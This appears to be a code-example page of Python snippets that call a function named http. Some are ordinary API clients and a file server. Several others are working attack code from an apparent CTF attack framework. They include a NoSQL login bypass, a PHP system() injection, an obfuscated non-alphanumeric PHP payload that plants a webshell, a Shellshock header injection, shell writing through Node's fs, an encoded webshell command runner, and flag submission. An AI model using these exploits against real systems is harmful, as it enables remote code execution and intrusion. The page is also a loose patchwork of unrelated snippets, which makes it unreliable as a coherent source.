Exemple #1
0
def run_p2p(target, target_port, cmd):
    #cmd = create_p2p(target,target_port,cmd)
    agent_path = shell_path + 'agent.php'
    http("get", target, target_port, agent_path, '', headers)
    cmd = ';echo "visit agent.php "'
    debug_print(cmd)
    return cmd
Exemple #2
0
def login(target):
    res = http("get", target, target_port, "/ez_web/admin/index.php", "", {})
    pos_1 = res.find("PHPSESSID=")
    pos_2 = res.find("path")
    cookie = res[pos_1:pos_2]
    print cookie
    data = "uname[$ne]=666&passwd[$ne]=123456&target=login.cgi"
    res = http("get", target, target_port, "/ez_web/cgi-bin/proxy.cgi?" + data,
               "", {"Cookie": cookie})
    if "success" in res:
        return cookie
    return False
Exemple #3
0
 def __init__(self, connection):
     self.http = http
     self.uri = "streams"
     self.http = http(url=connection["base_url"],
                      api_key=connection["api_key"],
                      debug_mode=connection["debug_mode"])
     self.stream = None
Exemple #4
0
def create_http():
    h = http(args.URL)
    h.setType(args.which)
    if args.verbose:
        h.setVerbosity(True)
    if args.headers:
        header = ""
        if len(args.headers) > 0:
            for head in args.headers:
                split_head = head.split(":")
                if len(split_head) == 2:
                    h.addHeader(split_head[0], split_head[1])
    #read the data or file to send it as content in post message and add content-Type of header
    body = ""
    if args.which == "post":
        if args.data:
            body = json.dumps(args.data)
            h.setData(body)
            if "Content-Type" not in h.header.keys():
                h.addHeader("Content-Type", "application/json"
                            )  #"\r\n" + "Content-Type: application/json")
            h.addHeader("Content-Length", str(len(body)))
        if args.file:
            with open(args.file, 'r') as f:
                body = f.read()
            h.setFile(body)
            if "Content-Type" not in h.header.keys():
                h.addHeader("Content-Type", "application/json"
                            )  #"\r\n" + "Content-Type: application/json")
            h.addHeader("Content-Length", str(len(body)))
    h.constructContent()
    return h
Exemple #5
0
def post_flag(flag):
    flag = flag.replace(" ", "").replace("\n", "")
    try:
        res = http("post", flag_server, flag_port, flag_url,
                   "flag=" + flag + "&token=" + flag_token, headers)
    except Exception, e:
        dump_error("flag post error", "flag server", "flag.py post_flag")
        return False
Exemple #6
0
def js_exe(target,filename,cookie):
    header = {"Cookie":cookie}
    res = "error"
    data = "require('./" + filename + "').a('sh ./4');1"
    try:
	res = http("get",target,target_port,"/ez_web/admin/count.php?cheat=" + quote(data),"",header)
    except Exception,e:
	dump_error(target,e,"js_exe.py js_exe")
	return False
Exemple #7
0
 def get_upload_token(self, uuid, parent=""):
     query = {
         "access_token": self.access_token,
         "client_id": self.config.get("jue", "access_key"),
         "client_secret": self.config.get("jue", "access_secret"),
         "uuid": uuid,
         "parent": parent
     }
     response = http().RawRequest(action=self.config.get("jue", "api_resource")+"cloud/get_upload_token", method="POST", query=query)
     return self.result(response)
Exemple #8
0
def post_flag(flag, target):
    flag = flag.replace(" ", "").replace("\n", "")
    try:
        headers['Cookie'] = flag_cookie
        res = http(
            "post", flag_server, flag_port, flag_url, "melee_flag=" + flag +
            "&token=" + flag_token + "&melee_ip=" + target, headers)
        debug_print(res)
    except Exception, e:
        dump_error("flag post error", "flag server", "flag.py post_flag")
        return False
Exemple #9
0
    def cloud_add_app_file(self, **file_info):
        query = {
            "access_token": self.access_token,
        }

        for k in file_info.keys():
            query[k] = file_info[k]

        response = http().RawRequest(action=self.config.get("jue", "api_resource")+"callback/add_app_file", method="POST", query=query)
        if response["status_code"] == 200:
            return response["text"]
        else:
            pass
Exemple #10
0
def db_admin_attack(target, cmd, cookie):
    header = {"Cookie": cookie}
    res = "error"
    print cmd
    cmd = quote(cmd)
    try:
        res = http(
            "get", target, target_port,
            "/ez_web/admin/db_admin.php?db=admin&action=listRows&collection=zzz&find=array(1);system('"
            + cmd + "');exit;", "", header)
#print res
    except Exception, e:
        dump_error(target, "something error happens",
                   "db_admin_attack.py db_admin_attack")
Exemple #11
0
 def client_credentials(self):
     query = {
         "grant_type": "client_credentials",
         "client_id": self.config.get("jue", "access_key"),
         "client_secret": self.config.get("jue", "access_secret"),
     }
     response = http().RawRequest(action=self.config.get("jue", "api_oauth")+"ClientCredentials", method="POST", query=query)
     if response["status_code"] == 200:
         try:
             self.memory.set(key="auth", value=response["text"])
             self.access_token = json.loads(response["text"])["access_token"]
         except:
             pass
         return response["text"]
     else:
         pass
Exemple #12
0
def attack(target, target_port, cmd, get_flag):
    is_vuln = 1
    flag = "hello world!"
    info = "success"
    reserve = 0
    if check_shell(target, target_port, ""):
        res = execute_shell(target, target_port, cmd)
    else:
        dump_warning(target, "check_shell failed", "function.py check_shell")
    try:
        res = http(
            'get', target, target_port,
            "/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);",
            '', {})
        print res
    except Exception, e:
        dump_error(target, "attack failed", "sample.py attack")
        res = "error"
Exemple #13
0
def file_write(target, filename, contents, cookie):
    header = {"Cookie": cookie}
    res = "error"
    print "waiting to writes shell..."
    i = 0
    for content in contents:
        data = "require('fs').appendFile('" + filename + "','" + content + "');1"
        if i == 0:
            data = "require('fs').writeFile('" + filename + "','" + content + "');1"
        try:
            res = http("get", target, target_port,
                       "/ez_web/admin/count.php?cheat=" + quote(data), "",
                       header)
            i += 1
        except Exception, e:
            dump_error(target, "something error happens",
                       "db_admin_attack.py db_admin_attack")
            return False
Exemple #14
0
 def secret_portal(self, uid, cfrom="cloud.jue.so", token=""):
     query = {
         "access_token": self.access_token,
         "client_id": self.config.get("jue", "access_key"),
         "client_secret": self.config.get("jue", "access_secret"),
         "uid":  uid,
         "from": cfrom,
         "token": token or hashlib.md5(".").hexdigest()
     }
     response = http().RawRequest(action=self.config.get("jue", "api_resource")+"secret/portal", method="POST", query=query)
     if response["status_code"] == 200:
         try:
             user_info = json.loads(response["text"])
             self.memory.set("userinfo", user_info["data"])
         except:
             pass
         return user_info["data"] or response["text"]
     else:
         pass
Exemple #15
0
def execute_shell(target, target_port, cmd):
    if shell_type == 1 or shell_type == 2:
        shell_name = "." + hashlib.md5(shell_salt +
                                       target).hexdigest() + ".php"
        shell_arg = hashlib.md5(shell_salt_2 + target).hexdigest()
        c_1 = "system"
        c_2 = cmd + ";"
        c_1 = rot13(base64.b64encode(c_1))
        c_2 = rot13(base64.b64encode(c_2))
        c_1 = c_1.replace('+', '%2B')
        c_2 = c_2.replace('+', '%2B')
        data = "a=" + c_1 + "&" + "b=" + c_2 + "&" + "hash=" + shell_arg
        debug_print("payload => " + data)
        try:
            res = http("post", target, target_port,
                       shell_path + "/" + shell_name, data, headers)
        except Exception, e:
            dump_error(e, target, "function.py execute_shell")
            return "error occurs"
        return res
Exemple #16
0
def execute_shell(target,target_port,cmd):
    shell_name,shell_arg = shell_hash(target,target_port)
    if shell_type==1 or shell_type==2:
        c_1 = "system"
        c_2 = cmd + ";"
        c_1 = rot13(base64.b64encode(c_1))
        c_2 = rot13(base64.b64encode(c_2))
        c_1 = c_1.replace('+','%2B')
        c_2 = c_2.replace('+','%2B')
        data = "a=" + c_1 + "&" + "b=" + c_2 + "&" + "hash=" + shell_arg
        debug_print("payload => " + data)
        try:
            res = http("post",target,target_port,shell_path + "/" +  shell_name ,data,headers)
        except Exception,e:
            dump_error(e,target,"function.py execute_shell")
            # execute shell timeout
            if 'timed out' in str(e) or 'Connection refused' in str(e):
                return "timeout"
            return "error occurs"
        return res
Exemple #17
0
def attack(target, cmd, get_flag):
    is_vuln = 1
    flag = "hello world!"
    info = "success"
    reserve = 0

    if check_shell(target, ""):
        res = execute_shell(target, cmd)
    else:
        dump_warning(target, "check_shell failed", "function.py check_shell")
        '''
	put your payload code here

	'''
        header = {"User-Agent": "() { :; }; " + cmd}
        try:
            res = http("get", target, target_port,
                       "/ez_web/cgi-bin/skin_api.cgi", "", header)
        except Exception, e:
            print e
        if "500" not in res:
            dump_error(target, "not vulnerable", "1.py bashshock")
Exemple #18
0
        res = http(
            'get', target, target_port,
            "/?content=$_='';$_[%2b$_]%2b%2b;$_=$_.'';$__=$_[%2b''];$_=$__;$___=$_;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$___.=$__;$____='_';$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$__=$_;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$__%2b%2b;$____.=$__;$_=$$____;$___($_[_]);",
            '', {})
        print res
    except Exception, e:
        dump_error(target, "attack failed", "sample.py attack")
        res = "error"

    index_1 = res.find("href='") + 6
    index_2 = res.find("'>shell")
    shell_url = "/" + res[index_1:index_2]
    print "[*]shell_url => " + shell_url
    try:
        data = "_=system('" + cmd + "')"
        res = http("post", target, target_port, shell_url, data, {})
        print len(res)
    except Exception, e:
        dump_error(target, "attack failed", "sample.py attack")
        res = "error"
    if get_flag:
        if check_flag(res):
            flag = res
            print "flag => " + res.replace(" ", "").replace("\n", "")
        else:
            dump_warning(
                target, "flag format error,you may need to rewrite the shell",
                "sample.py attack")
    elif res == "error":
        pass
    else:
Exemple #19
0
 def __init__(self, url, nodetype):
     self.handler = http(url)
     self.nodetype = nodetype
     self.__scrapedata()
Exemple #20
0
 def __init__(self, connection):
     self.http = http
     self.uri = "patterns"
     self.http = http(url=connection["base_url"],
                      api_key=connection["api_key"],
                      debug_mode=connection["debug_mode"])
Exemple #21
0
else:
    import pwd
    config.uid = pwd.getpwnam(config.uid)[2]
if config.gid.isdigit():
    config.gid = int(config.gid)
else:
    import grp
    config.gid = grp.getgrnam(config.gid)[2]

#load all our components
import device
scanners = device.scanners(config)
import control
notify = control.control(config, scanners)
import http
webserver = http.http(config, scanners)

#drop our privileges n stuff
os.umask(0077)
os.setgid(config.gid)
os.setuid(config.uid)

#let's spawn everything we need
t = threading.Thread(target = notify.serve_forever, name = 'Control')
t.setDaemon(True)
t.start()
t = threading.Thread(target = webserver.serve_forever, name = 'Webserver')
t.setDaemon(True)
t.start()

#signal handler
Exemple #22
0
def handle_client(conn, addr, dir):
    if args.debugging:
        print('Handle New client from', addr)
    try:
        while True:
            if args.arq:
                data = conn.recvall()
            else:
                data = conn.recv(2048)
            data = data.decode("utf-8")
            if not data:
                break
            (method, path, query, body, headers) = parseRequest(data)
            if args.debugging:
                print(method, path, body, headers)
            if ".." in path:
                if args.debugging:
                    print("Access Denied", path)
                r = http(400, "Access Denied".encode("ascii"))
                r.setContent(
                    "You are not allowed to access the files in this folder!".
                    encode("ascii"))
            else:
                if not dir.endswith("/"):
                    dir = dir + "/"
                # if not dir.startswith("./"):
                #     dir = "./" + dir
                path = (dir + path).replace("//", "/")
                # print(path)
                if method == "GET":
                    try:
                        if path.endswith("/"):
                            if args.debugging:
                                print("GET Directory", path)
                            files = os.listdir(path)
                            r = http(200, json.dumps(files).encode("ascii"))
                            r.addHeader("Content-Type", "application/json")
                        else:
                            if os.path.exists(path):
                                if args.debugging:
                                    print("FIND File", path)
                                r = http(200, "")
                                kind = magic.from_file(path, mime=True)
                                r.addHeader("Content-Type", kind)
                                if "text" in kind:
                                    with open(path, 'r') as f:
                                        content = f.read()
                                        r.setContent(content.encode("ascii"))
                                else:
                                    with open(path, 'rb') as f:
                                        content = f.read()
                                        r.setContent(content)

                                if "Content-disposition" in headers:
                                    r.addHeader("Content-disposition",
                                                headers["Content-disposition"])
                                elif "inline" in query:
                                    r.addHeader("Content-disposition",
                                                "inline")
                                else:
                                    r.addHeader("Content-disposition",
                                                "attachment")
                            else:
                                r = http(404, "".encode("ascii"))
                                r.setContent(
                                    "File could not be found!".encode("ascii"))
                    except OSError as e:
                        if args.debugging:
                            print(e)
                        r = http(400, e.strerror)
                elif method == "POST":
                    try:
                        if args.debugging:
                            print("POST File", path)
                        pathlib.Path(os.path.dirname(path)).mkdir(
                            parents=True, exist_ok=True)
                        lock = LockFile(path)
                        lock.acquire()
                        print(os.path.basename(path), " Content", body)
                        with open(path, 'a+') as f:
                            f.write(body + "\n")
                        lock.release()
                        r = http(200, "".encode("ascii"))
                        r.setContent(
                            "Data successfully added!".encode("ascii"))
                    except OSError as e:
                        if args.debugging:
                            print(e)
                        r = http(400, e.strerror)
                        r.setContent("Bad request!!!".encode("ascii"))
                else:
                    r = http(400, "")
            if args.debugging:
                print(r.headToString())
            if args.arq:
                conn.sendall(r.headToString().encode("ascii"), False)
            else:
                conn.sendall(r.headToString().encode("ascii"))
            conn.sendall(r.getBody())
            break

    finally:
        conn.close()
Exemple #23
0
		scan = ap_scan()
		if options.channel: scan.channel = options.channel
		scan.initialize()
	elif options.ssh:
		util.Msg('Starting SSH server...')
		tmp = ssh()
		tmp.initialize()
		tmp.dump = True
	elif options.ftp:
		util.Msg('Starting FTP server...')
		tmp = ftp() 
		tmp.initialize()
		tmp.dump = True
	elif options.http:
		util.Msg('Starting HTTP server...')
		tmp = http()
		tmp.initialize()
		tmp.dump = True
	elif options.smb:
		util.Msg('Starting SMB listener...')
		tmp = smb()
		tmp.initialize()
		tmp.dump = True
	elif options.wap:
		util.Msg('Starting wireless access point...')
		tmp = access_point()
		tmp.initialize()
	elif options.update:
		update()
	sys.exit(1)
Exemple #24
0
        scan = ap_scan()
        if options.channel: scan.channel = options.channel
        scan.initialize()
    elif options.ssh:
        util.Msg('Starting SSH server...')
        tmp = ssh()
        tmp.initialize()
        tmp.dump = True
    elif options.ftp:
        util.Msg('Starting FTP server...')
        tmp = ftp()
        tmp.initialize()
        tmp.dump = True
    elif options.http:
        util.Msg('Starting HTTP server...')
        tmp = http()
        tmp.initialize()
        tmp.dump = True
    elif options.smb:
        util.Msg('Starting SMB listener...')
        tmp = smb()
        tmp.initialize()
        tmp.dump = True
    elif options.wap:
        util.Msg('Starting wireless access point...')
        tmp = access_point()
        tmp.initialize()
    elif options.update:
        update()
    sys.exit(1)